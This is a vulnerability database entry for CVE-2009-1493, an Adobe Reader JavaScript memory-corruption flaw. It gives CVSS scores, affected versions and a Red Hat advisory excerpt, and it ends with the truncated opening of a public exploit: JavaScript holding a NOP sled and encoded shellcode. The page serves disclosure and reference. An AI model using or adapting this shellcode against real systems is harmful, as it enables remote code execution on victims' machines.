6.8
CVSSv2

CVE-2009-1493

Published: 30/04/2009 Updated: 29/09/2017
CVSS v2 Base Score: 6.8 | Impact Score: 6.4 | Exploitability Score: 8.6
VMScore: 685
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P

Vulnerability Summary

The customDictionaryOpen spell method in the JavaScript API in Adobe Reader 9.1, 8.1.4, 7.1.1, and previous versions on Linux and UNIX allows remote malicious users to cause a denial of service (memory corruption) or execute arbitrary code via a PDF file that triggers a call to this method with a long string in the second argument.

Vulnerable Product Search on Vulmon Subscribe to Product

adobe reader 9.1

adobe reader 8.1.4

Vendor Advisories

Synopsis Critical: acroread security update Type/Severity Security Advisory: Critical Topic Updated acroread packages that fix two security issues are now availablefor Red Hat Enterprise Linux 3 Extras, Red Hat Enterprise Linux 4 Extras,and Red Hat Enterprise Linux 5 SupplementaryThis update has been rated ...

Exploits

//############## //Exploit made by Arr1val //Proved in adobe 91 and adobe 814 on linux //############## var memory; function New_Script() { var nop = unescape("%u9090%u9090"); var shellcode = unescape("%uc92b%ue983%ud9ee%ud9ee%u2474%u5bf4%u7381%uc513%u4871%u83a5%ufceb%uf4e2%uaaf4%ue61b%u1b96%ucf4a%u29a3%u44c1%uf108%ufcdb%u4e75%u2585%u088c%ufeb ...